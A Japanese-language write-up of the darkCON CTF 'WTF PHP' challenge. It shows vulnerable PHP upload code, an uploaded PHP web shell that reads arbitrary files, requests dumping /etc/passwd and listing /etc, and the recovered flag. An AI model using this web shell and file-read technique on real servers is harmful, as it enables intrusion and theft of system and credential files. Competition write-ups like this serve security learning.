darkCON CTF: Writeup
Web
WTF PHP
<!-- if(isset($_FILES['fileData'])){ if($_FILES['fileData']['size'] > 1048576){ $errors='File size should be less than 1 MB'; } if(empty($errors)==true){ $uploadedPath = "uploads/".rand().".".explode(".",$_FILES['fileData']['name'])[1]; move_uploaded_file($_FILES['fileData']['tmp_name'],$uploadedPath); echo "File uploaded successfully\n"; echo '<p><a href='. $uploadedPath .' target="_blank">File</a></p>'; }else{ echo $errors; } } -->
単純にphpファイルをアップロードしてOSコマンド実行できるのかと思ったら単純なsystem
関数やshell_exec
は使えない。いろいろ試したところfile_get_contents
関数は使えるっぽいのでflagの場所さえわかればflagを読み取ることができる。
<?php echo file_get_contents($_GET['cmd']); ?>
http://wtf-php.darkarmy.xyz/uploads/1050302889.php?cmd=/etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/bin/false
scandir
関数を使って/etc/
ディレクトリの中にあるファイルを列挙する。
<?php $scan = scandir('/etc/'); print_r($scan); ?>
Array ( [0] => . [1] => .. [2] => .pwd.lock [3] => adduser.conf [4] => alternatives [5] => apache2 [6] => apt [7] => bash.bashrc [8] => bindresvport.blacklist [9] => ca-certificates [10] => ca-certificates.conf [11] => cron.daily [12] => debconf.conf [13] => debian_version [14] => default [15] => deluser.conf [16] => dpkg [17] => emacs [18] => environment [19] => f1@g.txt [20] => fstab [21] => gai.conf [22] => group [23] => group- [24] => gshadow [25] => gss [26] => host.conf [27] => hostname [28] => hosts [29] => init.d [30] => issue [31] => issue.net [32] => kernel [33] => ld.so.cache [34] => ld.so.conf [35] => ld.so.conf.d [36] => ldap [37] => libaudit.conf [38] => localtime [39] => login.defs [40] => logrotate.d [41] => machine-id [42] => magic [43] => magic.mime [44] => mailcap [45] => mailcap.order [46] => mime.types [47] => mke2fs.conf [48] => motd [49] => mtab [50] => nsswitch.conf [51] => opt [52] => os-release [53] => pam.conf [54] => pam.d [55] => passwd [56] => passwd- [57] => perl [58] => profile [59] => profile.d [60] => rc0.d [61] => rc1.d [62] => rc2.d [63] => rc3.d [64] => rc4.d [65] => rc5.d [66] => rc6.d [67] => rcS.d [68] => resolv.conf [69] => rmt [70] => securetty [71] => security [72] => selinux [73] => shadow [74] => shadow- [75] => shells [76] => skel [77] => ssl [78] => staff-group-for-usr-local [79] => subgid [80] => subuid [81] => sysctl.conf [82] => sysctl.d [83] => systemd [84] => terminfo [85] => timezone [86] => update-motd.d )
f1@g.txt
ファイルがflagっぽい。
http://wtf-php.darkarmy.xyz/uploads/1050302889.php?cmd=/etc/f1@g.txt
darkCON{us1ng_3_y34r_01d_bug_t0_byp4ss_d1s4ble_funct10n}
flag: darkCON{us1ng_3_y34r_01d_bug_t0_byp4ss_d1s4ble_funct10n}